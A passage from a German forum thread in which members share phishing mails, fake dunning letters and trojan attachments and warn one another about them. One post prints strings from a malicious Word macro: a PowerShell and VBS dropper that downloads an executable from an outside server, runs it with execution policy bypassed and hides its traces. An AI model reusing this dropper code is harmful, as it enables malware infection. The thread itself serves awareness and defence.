Sammelthread Gefälschte Emails, Trojaner und andere Virenmeldungen

Dieses Thema im Forum "News & IT Forum" wurde erstellt von Timok, 20 Februar 2007.

  1. Bestatter

    Bestatter Schwarzfahrer

    Registriert seit:
    30 Mai 2001
    Beiträge:
    4.904
    Wieso die Sterne?
    Ohne die könnte jeder die Nummer auf seine Shitlist setzten. :|

    --edit--
    Ich habe jetzt 0045574468 auf meine Sperrliste gesetzt.
    Die 999 Nummern aus dem Block sind jetzt eben alle ausgesperrt.
    Zuletzt bearbeitet: 18 Juli 2014
  2. JoPa

    JoPa Allround-Nichtsnutz

    Registriert seit:
    22 April 2001
    Beiträge:
    6.373
    Das gab's doch schon mal...
    http://www.tagesspiegel.de/medien/d...t-support-betrug-weitet-sich-aus/7965604.html
  3. Nostradamus

    Nostradamus Zensur besteht aus Frechheit und Angst.Tucholsky

    Registriert seit:
    1 Mai 2001
    Beiträge:
    9.240
    Ich möchte nicht wissen wie viele alte Leutchen darauf reinfallen.
    Antitrack und JoPa sagen Danke.
  4. g202e

    g202e The Long Man

    Registriert seit:
    7 Januar 2003
    Beiträge:
    5.514
    DB-Scam.JPG

    Sieht doch ganz gut aus, gelle?
    Mein Name ist auch vollständig und richtig geschrieben - ABER: Isch habe GAR KEIN Konto bei der DB.

    Der (angebliche) Verifizierungslink geht dann auch nach online-banking.deutsche.baank.org

    Gut gefälscht, wenn auch ohne Zertifikat...
    ultimate sagt Danke.
  5. Belzeboter

    Belzeboter Zombie

    Registriert seit:
    15 Mai 2003
    Beiträge:
    9.803
    Das hatte ich auch vorige Woche, an Freenet-Mail und den dort registrierten
    Namen (was nicht mein Richtiger ist)
    Da hat wohl jemand die UI-Datenbank angeknabbert ? :(

    Zumindest der Absender "service@deutsche-bank.de" ist für einen unbedarften
    User bedenklich - gut, den kann man fälschen, aber das weiß der DAU nicht.....


    -Belzeboter-
  6. g202e

    g202e The Long Man

    Registriert seit:
    7 Januar 2003
    Beiträge:
    5.514
    Ich wollte das jetzt mal an die Bank weiterleiten, habe aber leider keine "empfängnisbereite" Email-Adresse von irgendeiner Sicherheitsabteilung oder sowas gefunden.
    Bei Weiterleitung an deutschebank(at)db.com schlägt deren Spamfilter zu und verweigert die Annahme...naja
    Das Gleiche passiert bei security.db(at)db.com...
    Zuletzt bearbeitet: 4 August 2014
  7. g202e

    g202e The Long Man

    Registriert seit:
    7 Januar 2003
    Beiträge:
    5.514
    Meine Frau hat gerade eben folgende Email bekommen:
    Die IP scheint irgendwie "undeutsch" - ok, registriert in Indianapolis
    Die cab-Datei ist natürlich böse(sagt NOD32).
    Aber was soll das? Kann man eine cab ausführen? Oder glauben die, man zahlt ohne die "Rechnung" gesehen zu haben?
  8. chaospir8

    chaospir8 ★★★★★-Oldie

    Registriert seit:
    20 Juni 2001
    Beiträge:
    12.368
    @g202e
    Ich habe so etwas auch an meine primäre, private E-Mail-Adresse bekommen. Anderer Film. Andere IP-Adresse (irgendwo in Südkorea). Und billiger soll ich davonkommen ... nur ca. 380 Euro. Anhang: die von Dir genannte CAB-Datei in der sich eine einzige EXE befindet. Gestartet habe ich nicht.
  9. Zapata

    Zapata Bekanntes Mitglied

    Registriert seit:
    10 April 2009
    Beiträge:
    3.272
    CAB ist ja bekanntermaßen ein Archivdateiformat, das von Microsoft verwendet wird und unter Windows ohne weiteres geöffnet werden kann. In den letzten Wochen/Monaten wird Schadsoftware in E-Mails vermehrt in cab-Dateien gepackt, weil viele Firewalls dieses Format nicht auf dem Schirm haben und durchlassen. Je nach Unternehmensphilosophie und Firewall werden neben den ausführbaren Dateien (exe, bat, ...) oft nur die Standardarchivformate (zip, rar, ...) geblockt. Mit cab-Dateien können Angreifer in manchen/vielen Fällen diese erste Hürde überwinden und einen Endanwender dazu verleiten, die enthaltene Schadsoftware auszuführen ("Mitarbeiter klicken auf alles").

    Zapata
    Zuletzt bearbeitet: 6 August 2014
    g202e und eumel_1 sagen Danke.
  10. JoPa

    JoPa Allround-Nichtsnutz

    Registriert seit:
    22 April 2001
    Beiträge:
    6.373
    Nach 5 Tagen schon per Anwalt mahnen? :icon_lol::icon_lol::icon_lol:
    Und dann noch gleich 3x auf unbenutzten Adressen, die nur durch Catchall durchkommen... :icon_knock::icon_knock::icon_knock:


    Code:
    Sehr geehrter Kunde,
    
    
    in der unten aufgefuhrten Angelegenheit wurden wir berechtigt die finanziellen Interessen von Limango Shop GmbH zu vertreten.
    Die Bevollmachtigung wird anwaltlich versichert.
    Mit der Rechnung vom 7.08.2014 haben Sie sich verpflichtet die Summe von 453,15 Euro an unseren Mandanten zu zahlen.
    Dieser Pflicht sind Sie bis heute nicht nachgekommen.
    Weiterhin sind Sie aus Grunden des Verzuges dazu verpflichtet die Kosten unserer Inanspruchnahme zu tragen.
    
    Diese belaufen sich nach folgender Kostenrechnung:
    
    EUR 64,00 (Pauschalvergutung gema? § 2 Abs. 9 und 2 RVG}
    EUR 82,00 (nach Nr. 887 VV RGV} Wir verpflichen Sie Namens und Kraft Vollmacht unserer Mandantschaft auf den Gesamtbetrag auf das Bankkonto unseren Mandanten zu uberweisen.
    
    
    Die Kontodaten und die Lieferdaten Ihrer Bestellung finden Sie im angehangtem Ordner.
    Fur den Eingang der Zahlung geben wir Ihnen eine gesetzliche Zeitfrist bis zum 6.08.2014.
    Wenn Sie diese zeitliche Frist fruchtlos verstreichen, mussen Sie damit rechnen,
    dass wir ohne weitere Aufforderung gerichtliche Schritte einleiten werden.
    Dadurch wurden Ihnen weitere, betrachtliche Mahnkosten entstehen.
    Das Einhalten dieser zeitlichen Frist liegt auf jedem Fall in Ihrem Interesse.
  11. eumelfrau

    eumelfrau Bekanntes Mitglied

    Registriert seit:
    15 Mai 2004
    Beiträge:
    1.073
    Das war im Spam-Ordner, die 2. zip enthielt dann die Endung com, also eindeutig spam:


    Sehr geehrte/r ...,
    Sie haben eine nicht bezahlte Forderung bei unseren Mandanten Paypal GmbH. Das von Ihnen gespeicherte Bankkonto wurde im Moment der Abbuchung nicht genügend gedeckt um die Lastschrift durchzuführen. Namens unseren Mandanten fordern wir Sie auf, die offene Gesamtforderung unverzüglich zu begleichen.
    Die Überweisung erwarten wir bis spätestens 19.08.2014. Für Rückfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums. Aufgrund des bestehenden Zahlungsverzug sind Sie verpflichtet zuzüglich, die durch unsere Beauftragung entstandenen Kosten von 49,22 Euro zu tragen.
    Die Kontakt Telefonnummer und weitere Informationen ersehen Sie in Ihrer Rechnung anbei. Es erfolgt keine weitere Mahnung. Nach Ablauf der Frist wird die Angelegenheit dem Gericht und der Schufa übergeben. Eine vollständige Forderungsausstellung, der Sie alle Einzelpositionen entnehmen können, fügen wir bei.
    Mit verbindlichen Grüßen
    Paypal GmbH
    Beauftragter Rechtsanwalt Carl Keller
  12. eumel_1

    eumel_1 Der Reisende

    Registriert seit:
    2 Juni 2002
    Beiträge:
    9.546
    Hier mal wieder eine schlecht gefakte Mail, aber der DAU fällt womöglich drauf rein:
    ---------------------------------------------------------------------------
    Wir brauchen Ihre Hilfe

    aufgrund der steigenden Zahlungsausfalle mittels Lastschrift- und Rechnungszahlung,
    ist es in Zukunft leider nicht mehr moglich, eine Zahlung bei Amazon.de mit diesen Zahlungsarten ohne hinterlegte Kreditkarte zu tatigen. Daher ist es notwendig, dass alle Kunden eine Kreditkarte als Zahlungsmittel hinterlegen.

    Sollten Sie bereits eine Kreditkarte hinterlegt haben, bitten wir Sie, die bereits hinterlegte Kreditkarte zu verifizieren. Sollten Sie noch keine Kreditkarte besitzen, legen wir Ihnen gerne die Amazon VISA-Kreditkarte ans Herz. Nutzen Sie zur Verifizierung bitte den folgenden Link: Zum Sicherheitsverfahren - http://amazondeacccheck.com

    Bitte beachten Sie, dass Sie Ihr Amazon.de-Kundenkonto ohne hinterlegte Kreditkarte in Zukunft nicht mehr nutzen konnen.


    Mit freundlichen Grußen,
    Ihr Amazon.de Kundenservice

    ---------------------------------------------------------------------------
    Habe mal die Links unbrauchbar gemacht, sonst klickt da noch jemand erfolgreich drauf :D

    PS: wenn man den Link erfolgreich klickt, passiert erstmal noch nix, aber schon die Fragen dort sind super:
    Wer da seine Daten einträgt hat bestimmt danach Bewegung auf seinem Konto :D
    Man beachte auch die Anzahl der Sterne (mandatory questions)!
  13. vaGem

    vaGem Bekanntes Mitglied

    Registriert seit:
    6 Juni 2002
    Beiträge:
    766
    Bekomm ich momentan 2x die Woche

    Der Link führt nach handelsbank.c...
    oder dieses

    Die Links zum Video sind auf megabank.c...

    Obwohl ich neugierig bin, konnte ich mich zurückhalten. Naja, vielleicht mach ich mir mal den Spaß mit
    meinem Laptop. Der muss eh mal neu aufgesetzt werden.
  14. eumel_1

    eumel_1 Der Reisende

    Registriert seit:
    2 Juni 2002
    Beiträge:
    9.546
    Wo ist da die Abzocke?
    Das ist IMHO der normale SPAM, davon bekomme ich auch jede Menge, momentaner Tophit ist die Masche mit der Verführung von Frauen (kein genauerer Text mehr möglich, weil sofort gelöscht)
  15. vaGem

    vaGem Bekanntes Mitglied

    Registriert seit:
    6 Juni 2002
    Beiträge:
    766
    Ups, da hab ich was vergessen zu posten

    Jetzt mit nur 200€ Ihr eigenes Konto eröffnen.

    Aber es stimmt, eigentlich der normale Spam, die Leute sind selbst schuld
    200€ für ein Konto zu geben
  16. Nostradamus

    Nostradamus Zensur besteht aus Frechheit und Angst.Tucholsky

    Registriert seit:
    1 Mai 2001
    Beiträge:
    9.240
    Ich versteh es nur nicht. So was kann doch eigentlich nur weiter Bestand haben wenn es sich für die Spinner lohnt, wenn also Absatz da ist.
    Aber um auf solche Schundmails ernsthaft zu reagieren muss man doch ein unwahrscheinlich geistiger Tiefflieger sein, eigentlich noch unter dem IQ eines Neandertalers angesiedelt sein. Wobei das vermutlich schon eine Beleidigung der Neandertaler ist. Ist es denn tatsächlich so schlimm um die Menschheit bestellt?
    Antitrack sagt Danke.
  17. Mr. Big

    Mr. Big old geezer

    Registriert seit:
    2 Januar 2002
    Beiträge:
    10.507
    Ja!
    mokko, Antitrack, DeSmi und 2 andere sagen Danke.
  18. vaGem

    vaGem Bekanntes Mitglied

    Registriert seit:
    6 Juni 2002
    Beiträge:
    766
    Die hoffen auf die Geldgier der Menschheit. Mit nix tun viel Geld machen, da lohnen sich 200€ doch.
    Ausserdem hat man ja eine 12 Monatige Geldzurückgarantie, also kein Risiko :yo:icon_tsts:
  19. xtraa_

    xtraa_ Serviervorschlag

    Registriert seit:
    28 Februar 2003
    Beiträge:
    14.988
    Falsches Flash Update umgeht Chromes Sicherheitssystem
    Erwähnenswert ist offenbar, dass sich die Software automatisch runterlädt.

    http://thehackernews.com/2014/09/malware-can-bypasses-chrome-extension.html

    Gruß
    xtraa
  20. JoPa

    JoPa Allround-Nichtsnutz

    Registriert seit:
    22 April 2001
    Beiträge:
    6.373
    Wenn ich es richtig verstehe, gilt das nur für Chrome-User. Kann ich mich mit dem FF nun sicher fühlen?
  21. xtraa_

    xtraa_ Serviervorschlag

    Registriert seit:
    28 Februar 2003
    Beiträge:
    14.988
    Sicher fühlen kann man sich ja eh nie mehr :D Aber vom Mozzarella Feuerfuchs steht da nix, insofern scheint es da auch kein Problem zu geben :)
  22. Nostradamus

    Nostradamus Zensur besteht aus Frechheit und Angst.Tucholsky

    Registriert seit:
    1 Mai 2001
    Beiträge:
    9.240
    Ja heute war ich wieder bei so einem. Mein bekannter alter "Kunde". Der ist echt so dämlich, dass ihn die Schweine beißen :icon_lol:
    Gestern hat er eine Mail vorn einem Rechtsanwalt bekommen, Mahnung und Mahngebüren, weil sein Konto nicht gedeckt wäre und Amazon kein Geld buchen konnte, Details zur Rechnung im Anhang :icon_funny::D
    Den Anhang hat er geöffnet, ist aber angeblich nichts passiert weder einen Word noch PDF Datei hat sich geöffnet :icon_lol:
    Und dann hat er dem Absender geantwortet und gefragt was das für ein Unsinn sein soll, dass sich a die Rechnung nicht öffnen lässt und er b keine Schulden bei Amazon hat. Antwort hat er noch keine :icon_funny::icon_lol:
    Ich könnt mich auf den Boden hauen.
    Natürlich war alles verseucht.
    Angerufen hat er mich aber eigentlich nur weil Firefox nicht mehr startete.
    Und an der Stelle muss ich mal sagen auch die Viren Macher sind nicht mehr das was sie mal waren. Dieser hatte anstelle von Hirnmasse offensichtlich nur Scheiße im Kopf.
    Ich mein wie kann ich als Virenprogrammierer den Browser lahmlegen, so das der User erst drauf aufmerksam wird das was faul ist.
    Wäre den sein Browser noch fehlerfrei gestartet, hatte er mich nicht angerufen und würde womöglich monatelang als Zombie-PC durchs Web geistern.
    mokko sagt Danke.
  23. g202e

    g202e The Long Man

    Registriert seit:
    7 Januar 2003
    Beiträge:
    5.514
    Kommt mir bekannt vor. Auch ein angeblicher Amazon-Schuldner in meinem Bekanntenkreis hatte letztens so eine Mail.
    Mein "Client" hat zwar den Anhang nicht geöffnet, aber er hat dem Absender(Rechtsabteilung Amazon mit der Emailadresse "bluefox(at)t-online.de") geantwortet und diesem mitgeteilt, dass sein Konto zum Zeitpunkt der angeblich misslungenen Abbuchung mit gut 1300 Teuronen gut gefüllt war. Hilfe! :icon_knock:
    Nostradamus sagt Danke.
  24. jr33

    jr33 .....

    Registriert seit:
    10 Juli 2005
    Beiträge:
    10.104
    Email, kein Anhang, kein Link, nur
    ne linke Masche:

    Absender: De Mitch <de_mitch207@login.holaphone.co.uk>


    ich habe gerade keine zeit, wenn also jemand absahnen möchte, nur zu.... [​IMG]
  25. g202e

    g202e The Long Man

    Registriert seit:
    7 Januar 2003
    Beiträge:
    5.514
    Eine Bekannte bekam vor kurzem folgende Email:

    Der Witz an der Sache ist jetzt, dass dieses äußerst intelligente Password tatsächlich in der Vergangenheit jahrelang genutzt wurde.

    Ist das nur ein besonders freundlich formulierter Erpressungsversuch?
    Gibt es irgendeine Möglichkeit, etwas mehr über den Absender zu erfahren?
  26. eumel_1

    eumel_1 Der Reisende

    Registriert seit:
    2 Juni 2002
    Beiträge:
    9.546
    Das ist der selbsternannte Undercover-Engel, das bedeutet, das ist ein Bettelbrief. Dass man das Passwort natürlich ändern sollte, falls nicht bereits geschehen, muss ich wohl nicht extra erwähnen?
    Mehr Info: http://heise.de/-2408702
    g202e sagt Danke.
  27. Antitrack

    Antitrack Bekanntes Mitglied

    Registriert seit:
    10 Januar 2003
    Beiträge:
    4.153
    Oder das Password wurde einfach geraten und in der Massenmail verschickt. Motto: 0.1 % der Spam-Empfänger haben "123456" als Passwort! :D
  28. g202e

    g202e The Long Man

    Registriert seit:
    7 Januar 2003
    Beiträge:
    5.514
    Der Prozentsatz könnte höher sein(?).
    Aber "heizung" ist so bescheuert; das dürfte eher selten sein...
  29. eumel_1

    eumel_1 Der Reisende

    Registriert seit:
    2 Juni 2002
    Beiträge:
    9.546
    Naja, "heizung" als Passwort einer Heizungsfirma ist schon etwas (höflich formuliert) dämlich?
  30. Zapata

    Zapata Bekanntes Mitglied

    Registriert seit:
    10 April 2009
    Beiträge:
    3.272
    Dann schau Dir mal die Auswertung von LastPass aus dem Gmail-Leak an:

    [​IMG]
    Antitrack sagt Danke.
  31. eumel_1

    eumel_1 Der Reisende

    Registriert seit:
    2 Juni 2002
    Beiträge:
    9.546
    Kam heute gleich zweimal auf eine meiner Uralt-Mailadressen reingeflattert, scheinbar sind mal wieder ein paar uralte Datensätze vertickert worden.

    Mal wieder ein Beispiel dafür, wie dumm manche doch sein müssen, um zu schauen, was sie denn bestellt haben:

    [​IMG]
    Eigenschaften verraten dann das es von:
    Code:
    Received: from vlite.precisionmedia.co.za (vlite.precisionmedia.co.za [78.129.158.139])
    kam. Diese Website wiederum scheint bereits gesperrt, denn wenn man da rauf geht, landet man in UK und bekommt eine Fehlermeldung dass man sich an den Provider wenden solle, so man denn der Webmaster sei.
    Klicken auf den Link führt zu einer Dropbox, wo dann eine Datei mit dem Namen ZahlungsdatenNVT2N.scr wartet, welche bei Ausführung einen Trojaner installiert, siehe die Auswertung von Virustotal.com:
    https://www.virustotal.com/de/file/...a887b151c7161d091a59bfa8/analysis/1414687291/
    11 von 53 Virenscannern schlagen an, das ist auf keinen Fall gut, zeigt es doch, dass dieser Trojaner noch neu ist und nicht von allen Scannern erkannt wird. Dumm dran, wenn der eigene Virenscanner ihn nicht erkennt, denn dann läuft man in Gefahr sich unbemerkt einen Trojaner zum einnisten zu verhelfen.

    Exkurs für die Nicht-Profis:
    Dateiendung .scr ist die Endung für einen Bildschirmschoner, aber dahinter ist einfach eine ausführbare .exe versteckt, welches mit Sicherheit ein Schadprogramm startet. Dies ist eine beliebte Masche, denn so kann der Virenscanner des Providers keine Schadsoftware herausfiltern.
    Falls Ihr Euch mal nicht sicher seid, einfach die betreffende Datei zu Virustotal.com hochladen und analysieren lassen. Meine Empfehlung: ab 5 Treffer wird die Datei nicht geöffnet.
    Zuletzt bearbeitet: 30 Oktober 2014
  32. Spaceboy1963

    Spaceboy1963 Bekanntes Mitglied

    Registriert seit:
    10 Dezember 2001
    Beiträge:
    1.780
    Heute kam eine eMail, das ich ein Fax bekommen habe :)
    Das Fax war freundlicherweise als Anlage im MS-Word-Format *.doc dabei :D
    Das Öffnen des Dokumentes in der Sandbox brachte zunächst eine Warnung von Word über potentiell gefährliche Inhalte (Macros) und gleichzeitig eine Bedienungsanleitung für das Freigeben von Inhalten in allen WinWord-Varianten (Inhalt des Dokuments) zur Anzeige.
    Das Öffnen der Datei im Editor in der Sandbox enthielt neben viel kryptischen Zeichen auch sehr lustige "lesbare" Sequenzen wie

    Code:
     c:\windows\temp ¶  \adobeacd-update.p ¶  s  ¶  1  ' (¶  c:\windows\temp ¶  \adobeacd-update.b ¶  a  ¶  t  ' *¶  c:\windows\temp ¶  \adobeacd-update.  ¬ v $ .  ¶  b  ¶  s  ' ,ø  ] òÈ  ] òà  ] òø  ] ò    ° ' 0  ° ' 2  ° ' 4  (  0 « Ì   0 Ò ¶ > $hashroot = '47-ab-cd-f5-8f-bf-f9-1f-94-65-51-7b-96-ea-13-d3';Ö VôÚQ  0 Ò ¶  $hash = '0';Ö aé.aé  0 Ò ¶      $down = N ¶  ew ¶  -O ¶  bject Sy ¶  stem.N ¶  et.  ¬ W $ .  ¶  eb ¶  Cli  ¶  ent; Ö      0 Ò ¶ A $hashasd = 'asdjäæûôîâäëôûîâäôûkhasjkdhajkshdiusakhdsakhdkjashd'; Ö  0 Ò ¶ $file = 'c:\windows\temp\4¶  44.e ¶  xe'; Ö ÿÿÿÿ  0 Ò ¶ 2 $hashasd = 'asdjkhasjkdhajkshdiusakhdsakhdkjashd';Ö  0 Ò ¶  $down ¶  .  ¬ D $ .  ¶  ow ¶  nloa ¶  dFi  ¶  le($u  ¶  rl,$ ¶  file); Ö Jÿ  0 Ò ¶ & $ScriptDir = $MyInvocation.ScriptName;Ö ±}Jÿ  0 Ò ¶ + $someFilePath = 'c:\windows\temp\' + '444.e ¶  xe ¶  '; Ö        0 Ò ¶ 6 $vbsFilePath = 'c:\windows\temp\' + 'adobeacd-update.v¶  b  ¶  s';  Ö    0 Ò ¶ 6 $batFilePath = 'c:\windows\temp\' + 'adobeacd-update.b¶  a  ¶  t';  Ö    0 Ò ¶ 5 $psFilePath = 'c:\windows\temp\' + 'adobeacd-update.p ¶  s  ¶  1';  Ö  à  , Print #FileNumber, "Do { Start-Sleep -s 10;"      à  g Print #FileNumber, "$md5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;"  à  € Print #FileNumber, "$hash = [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($someFilePath))); }"  à  4 Print #FileNumber, "Until ($hash -Match $hashroot);"        0 Ò ¶  Start-Sleep -s 10;Ö  0 Ò ¶  c ¶  m  ¶  d.e  ¬ x $ .  ¶  e /c  'c:\windows\temp\444.e ¬ x $ .  ¶  e';     Ö        0 Ò ¶  $file1 = gci $vbsFilePath -ForceÖ    0 Ò ¶  $file2 = gci $batFilePath -ForceÖ    0 Ò ¶  $file3 = gci $psFilePath -Force Ö    0 Ò ¶ N $file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::HiddenÖ ÿÿÿÿ  0 Ò ¶ N $file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::HiddenÖ      0 Ò ¶ N $file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::HiddenÖ ÿÿÿÿ  0 Ò ¶ 7 If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath } Ö ÿÿ  0 Ò ¶ 7 If (Test-Path $batFilePath){ Remove-Item $batFilePath } Ö    0 Ò ¶ 9 If (Test-Path $someFilePath){ Remove-Item $someFilePath } Ö  0 Ò ¶ ( Remove-Item $MyINvocation.InvocationNameÖ    0 V         ,  2 « Ì   2 Ò ¶ g currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName))) Ö ÿÿ  2 Ò ¶ @ caisudkasdknadsklasdjaklajksjklasdkjlajkalkadsjasjklajklah38e = ¬ " $ .  ¶  231  ¬ " $ .  Ö  2 Ò ¶  S ¶  et o ¶  bj ¶  F  ¶  SO=C ¶  re ¶  at ¶  eO ¶  b  ¶  je ¶  ct(  ¬ " $ .  ¶  S  ¶  cr ¶  ipt  ¶  ing.F  ¶  ileS ¶  ystem  ¶  Ob ¶  ject ¬ " $ .  ¶  )  Ö ÿÿÿÿ  2 Ò ¶  currentFile = ¬ " $ .  ¶ # c:\windows\temp\adobeacd-update.ps1  ¬ " $ .  Ö ³ÿ  2 Ò ¶  caisudkh38e = ¬ " $ .  ¶  231  ¬ " $ .  Ö    2 Ò ¶
    quid8hiqje =  ¬ " $ .  ¶  231  ¬ " $ .  Ö ÿÿ  2 Ò ¶  ¬ S $ .  ¶  et   ¬ o $ .  ¶  bj ¬ S $ .  ¶
    hell = Create  ¬ O $ .  ¶  bject( ¬ " $ .  ¶  W  ¬ s $ .  ¶  cript. ¬ s $ .  ¶  hell ¬ " $ .  ¶  )  Ö    2 Ò ¶ G caksjhdjaskdhakjshdjkashkjdhaksjdhkjashdjkashdjkashdjkashdjakdahjksd =  ¬ " $ .  ¶  231  ¬ " $ .  Ö  2 Ò ¶  ¬ o $ .  ¶  bj ¬ S $ .  ¶      hell.run   ¬ " $ .  ¶  p  ¬ o $ .  ¶  wer  ¬ S $ .  ¶  hell.e ¬ x $ .  ¶  e -n ¬ o $ .  ¶  exit -ExecutionP ¬ o $ .  ¶  licy bypass -n ¬ o $ .  ¶  pr ¬ o $ .  ¶  file -file   ¬ " $ .  ¶   & currentFile,0,true  Ö        2 Ò ¶ @ caisudkhlkasdjkdlskjldsajkldasjkdsajkldasklsadklwqiodiqwjd38e = ¬ " $ .  ¶  231  ¬ " $ .  Ö  2 V         *  4 « Ì   4 Ò ¶      @echo off Ö  4 Ò ¶  ping 1.1.2.2 -n 2 Ö  4 Ò ¶  c ¶  sc ¶  ri ¶  pt ¶  .e ¬ x $ .  ¶  e  ¬ " $ .  ¶ ! c:\windows\temp\adobeacd-update.v  ¶  b  ¶  s  ¬ " $ .  Ö dhaj  4 Ò ¶  exitÖ ashd';  4 V  ¶  $d  ($ ~   ' 8  *$ ~   ' :  ,$ ~   ' <  (  @A@>   *  @A@> fi  ,  @A@>   8¬   b tDir¬   A@B tion¹ ÿÿ¸    :¬   b 4 ¬   A@B ileP¹ ÿÿ    <¬   b mp\'¬   A@B  xe¹ ÿÿh  à  * Shell "cmd.exe /k java -jar " + MY_FILEDIR  *¬  $ D ' 6d-updaA@F    ÿ  Hþ  J! L“  4   H! Nõ lePa¶  < ¶  sel  ¶  ect> 9 dbe¶   5 P( d  T9 R  ZÑ XC@V  q ÿÿ
      ÿ  Hþ È = 'c:\ÿ  Hþ  J! L“ adobea  H! Nõ ¶  ¶  </s ¶  ele  ¶  ct>  9 d¶   5 P( d {  T9 R  ZÑ XC@V ÿÿq ÿÿ
      ÿ  Hþ È eNumbeo ÿÿ
      –(    ] òˆ    `  \ ' ^.S  `  ^    b togrA@„    ¹ ÿÿÀ  o ÿÿ¸  –     A@$    o ÿÿ   –à    A@$    o ÿÿˆ  –     ] ò`  ] òx  ] ò  ] ò°  ] òÐ  í  J! l. j:R  j! Nõ umbe  f9 d·9 r  C@V      xÑ v  jB@t  4 í  J! l. nee  j!   n( z  h9 d·9 r  C@V      |Ñ v  jB@t e /c    j! z  n(   n! ~' p$ <q ÿÿh  o ÿÿ`  ¶  <se ¶  lect>  ' f¶  </sel ¶  ect> ' h  0 Ò ¶ & $url  = 'http://idtvietnam.vn/images/o¶  rk.e ¶  xe'; Ö ÿÿÿÿH  ÿÿÿÿ  m¶ Attribut e VB_Nam e = "Thi sDocument"
    
    ŒBasŒ1Normal.VGlobal!ªSpaclFalse¢CreatablPre decla Id žTru
    BExposeTemp lateDeriv$Customiz„Cƒ1Sub  Auto_Ope@n()
      h@
    End €
    ...das kann doch bestimmt nichts Gutes bedeuten - oder?:icon_mrgreen:

    Kennt sich jemand aus und kann so in etwa abschätzen was es mit diesem Makro auf sich hat?

    Es grüßt freundlich...
    Spaceboy
  33. Bestatter

    Bestatter Schwarzfahrer

    Registriert seit:
    30 Mai 2001
    Beiträge:
    4.904
  34. Theoderix

    Theoderix Miesepeter

    Registriert seit:
    22 April 2001
    Beiträge:
    3.248
    Ich hatte vermutet das stammt aus diesem Umfeld. Kamen diverse heute an, als Fax oder als Faksimile Anhang. Dran hing immer ein word doc.
    Spaceboy1963 sagt Danke.
  35. WereWOLF GANG

    WereWOLF GANG Bekanntes Mitglied

    Registriert seit:
    26 September 2001
    Beiträge:
    2.711
    Es ist mal wieder eine PayPal Phishing Mail unterwegs. Echter Absender ist nicht (wie vorgetäuscht):
    service.paypal.de
    sondern offensichtlich:
    Return-Path: p-muellens@t-online.de
    Received: from h2011090.stratoserver.net ([81.169.150.5])

    Wegen eines Cyber-Angriffs sei angeblich eine Kontenverifizierung erforderlich:

    Lol!
    xanadu sagt Danke.
  36. adhome

    adhome Bekanntes Mitglied

    Registriert seit:
    10 Juni 2001
    Beiträge:
    6.276
    Absender werden nicht vorgetäuscht. Das ist ein Eingabefeld wie der Titel der Email.

    Ist eigentlichbekannt, wann diese "sicheren" Mails kommen? Also wo der Absender verifiziert ist.
    (neee.. nicht DE-Mail.)
  37. groopy

    groopy Bekanntes Mitglied

    Registriert seit:
    22 April 2001
    Beiträge:
    4.198
    Gab es mal eine Zeit wo keine PayPal-Phishing-Mails unterwegs waren? :o
    Tank, chaospir8, Muffy24 und 2 andere sagen Danke.
  38. The Lordy

    The Lordy Paranoiker a.P.

    Registriert seit:
    27 Juni 2001
    Beiträge:
    6.040
    echt jetzt ? erst heute ? :icon_lol:
    Das ist schon Monate alt.
  39. eumel_1

    eumel_1 Der Reisende

    Registriert seit:
    2 Juni 2002
    Beiträge:
    9.546
    Aktuell sind auch wieder gefälschte Telekomrechnungen unterwegs mit einem dreistellien Betrag, der mich natürlich so neugierig macht, dass ich die Rechnung.pdf.exe sofort aufmache.
    Und erst gestern erhielt ich eine Rechnung von Vodafone, ähnlich gestrickt, nur wird der Trojaner nicht mitgeschickt sondern als zip von einem externen Server heruntergeladen.

    Immer daran denken: Gehirnprothese einschalten, wenn Brain.exe grad abgestürzt ist! :icon_lol:
  40. groopy

    groopy Bekanntes Mitglied

    Registriert seit:
    22 April 2001
    Beiträge:
    4.198
    Hat eine Gehirnprothese auch eine Brain.exe? Erstaunlich was die Medizin heute schon alles zu leisten vermag ...:icon_lol:
  41. eumel_1

    eumel_1 Der Reisende

    Registriert seit:
    2 Juni 2002
    Beiträge:
    9.546
    Sorry für OffTopic:
    NEIN!
    Die Gehirnprothese ersetzt doch die Brain.exe :D

    Leider bei immer mehr Mitbürgern, schau dich nur um.
    Schade nur, dass die Gehirnprothese auch einige Nebenwirkungen hat, sie führt z.B. dazu, BLÖD zu lesen und das sogar zu glauben, sowie weiterhin zu erhöhten Konsum von ASSI-TV. Auch übermäßiges Smartphoneglotzen wurde bereits beobachtet. :D
    Fonti sagt Danke.
  42. The Lordy

    The Lordy Paranoiker a.P.

    Registriert seit:
    27 Juni 2001
    Beiträge:
    6.040
    is ja auch logisch.
    Eine Prothese kann mitunter eben nur rudimentäre Grundfunktionen zur Verfügung stellen.
    Alleine die etwas unprofessionelle Gewichtsverteilung führt zu der nach vorne kippenden Kopfhaltung, die sich allerdings bei dem entlastenden Smartphone-Addon nutzbar machen lässt. Eingeschränkte Artikulations-Funktionen werden dabei ebenfalls durch Wischbewegungen ergänzt.
    Die resultierende Bußhaltung kommt den kirchenlichen Sektenvertretern sehr entgegen.
    Für die massive Einspeisung vom Assi-TV bemüht sich bekanntermassen gerade die Mutter der Nation beim Breitband-Ausbau im Neuland.

    Sobald die rechtlichen Grundlagen zur Sterbehilfe bzw. Selbsttötung (gemäss 2021 "Die überleben wollen") durchgesetzt sind, widmet sie sich der Einführung von "Soylent Green" und der Abwrackprämie für Alt-Brains bei gleichzeitigem Einsatz der Gehirnprothese Redux inkl. Smartphone freier Wahl.

    :yo
    Fonti und eumel_1 sagen Danke.
  43. Zapata

    Zapata Bekanntes Mitglied

    Registriert seit:
    10 April 2009
    Beiträge:
    3.272
    Wie "gut" eine Gehirnprothese manchmal die Brain.exe ersetzt, sieht man z. B. daran, wenn man Pistorius Hausarrest auferlegt, dann aber feststellt, dass die Kontrolle mit einer Fußfessel irgendwie keine wirkliche Absicherung ist.


    Zapata
    eumel_1 sagt Danke.
  44. ibinsfei

    ibinsfei Team (Technik) Mitarbeiter

    Registriert seit:
    12 August 2001
    Beiträge:
    6.494
    Ich habe es mal mit dem vorhandenen Thread gemerged.
  45. octopussy

    octopussy Aufsichtsrats-vorsitzender

    Registriert seit:
